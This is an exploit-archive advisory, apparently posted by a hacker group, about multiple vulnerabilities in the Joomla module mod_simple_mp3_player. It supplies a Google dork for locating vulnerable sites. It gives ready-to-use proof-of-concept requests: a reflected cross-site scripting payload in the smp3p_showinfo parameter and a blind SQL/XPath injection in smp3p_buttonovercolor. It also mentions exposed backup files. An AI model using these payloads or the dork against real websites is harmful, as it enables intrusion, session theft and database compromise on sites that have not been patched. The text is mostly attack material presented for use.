facebook facebook twitter rss

Joomla module (mod_simple_mp3_player) multipe vulnerabilities

Author: Elite Trojan , Published: 21-09-2012
###############################################################################
# Exploit Title: Joomla module (mod_simple_mp3_player) multipe vulnerabilities
# Date: 24/07/2012
# Author: Elite Trojan
# Category:: webapps
# Google dork: inurl:"/modules/mod_simple_mp3_player/"
# Tested on: windows , BackTrack
###############################################################################

1- Cross Site Scripting (XSS)

Affected File : /modules/mod_simple_mp3_player/popup.php

The Variant : smp3p_showinfo

[+}~ P0c : GET /modules/mod_simple_mp3_player/popup.php?smp3p_useplaylist=1&smp3p_playlistpath=http%3A%2F%2Ffw%2Ewebtoots%2Ecom%2Fmodules%2Fmod_simple_mp3_player%2Fplaylist%2Fplaylist%2Etxt&smp3p_path=111-222-1933email@address.tst&smp3p_files=111-222-1933email@address.tst&smp3p_titles=111-222-1933email@address.tst&smp3p_width=200&smp3p_height=98&smp3p_showinfo=
>"><ScRiPt%20%0a%0d>alert(xss)%3B</ScRiPt>
&smp3p_showvolume=1&smp3p_volume=75&smp3p_volumewidth=40&smp3p_volumeheight=8&smp3p_autoplay=0&smp3p_loop=0&smp3p_shuffle=0&smp3p_showloading=autohide&smp3p_loadingbarcolor=494845&smp3p_showlist=1&smp3p_showplaylistnumbers=0&smp3p_playlistcolor=66645C&smp3p_playlistalphacolor=30&smp3p_showslider=1&smp3p_sliderwidth=20&smp3p_sliderheight=6&smp3p_slidercolor1=8F8E8B&smp3p_slidercolor2=6C6A63&smp3p_sliderovercolor=AFC400&smp3p_bgimage=-1&smp3p_bgcolor=FFFFFF&smp3p_bgcolor1=444444&smp3p_bgcolor2=000000&smp3p_textcolor=66645C&smp3p_currentmp3color=AFC400&smp3p_buttonwidth=20&smp3p_buttoncolor=8F8E8B&smp3p_buttonovercolor=AFC400&smp3p_scrollbarcolor=585857&smp3p_scrollbarovercolor=AFC400


2-Blind SQL & XPath injection


Affected File : /modules/mod_simple_mp3_player/popup.php

The Variant : smp3p_buttonovercolor

[+}~ P0c : /modules/mod_simple_mp3_player/popup.php?smp3p_useplaylist=1&smp3p_playlistpath=http%3A%2F%2Ffw%2Ewebtoots%2Ecom%2Fmodules%2Fmod_simple_mp3_player%2Fplaylist%2Fplaylist%2Etxt&smp3p_path=111-222-1933email@address.tst&smp3p_files=111-222-1933email@address.tst&smp3p_titles=111-222-1933email@address.tst&smp3p_width=200&smp3p_height=98&smp3p_showinfo=1&smp3p_showvolume=1&smp3p_volume=75&smp3p_volumewidth=40&smp3p_volumeheight=8&smp3p_autoplay=0&smp3p_loop=0&smp3p_shuffle=0&smp3p_showloading=autohide&smp3p_loadingbarcolor=494845&smp3p_showlist=1&smp3p_showplaylistnumbers=0&smp3p_playlistcolor=66645C&smp3p_playlistalphacolor=30&smp3p_showslider=1&smp3p_sliderwidth=20&smp3p_sliderheight=6&smp3p_slidercolor1=8F8E8B&smp3p_slidercolor2=6C6A63&smp3p_sliderovercolor=AFC400&smp3p_bgimage=-1&smp3p_bgcolor=FFFFFF&smp3p_bgcolor1=444444&smp3p_bgcolor2=000000&smp3p_textcolor=66645C&smp3p_currentmp3color=AFC400&smp3p_buttonwidth=20&smp3p_buttoncolor=8F8E8B&smp3p_buttonovercolor=AFC400+and+31337-31337=0&smp3p_scrollbarcolor=585857&smp3p_scrollbarovercolor=AFC400

3- BackUp Files :

affected Item : /modules/mod_simple_mp3_player/Copy of popup.


+--------------------------------------------------+
[»] #-DzMafia-#
[»] We are : password, eliteTrojan, gel-dz, BackUp
+--------------------------------------------------+
F0llow Us at : www.fb.me/Ma.dz.fia
+---------------------------------------------------+
[»] Greetz to :
[ TrOon,Aghilas,r00t_dz,Hacker-fire,Vaga-hacker,Imed Lakamora, DjamilJocker, YacineJocker, dzN00b ]
[ & -> !Muslims!,Mosta,team152,Inj3ct0r ]
[ And all my Freinds + Algerian Hackers ]
-----------------------------------------------------+
DzMafia © 2012 All rights reserved.

Like us on Facebook :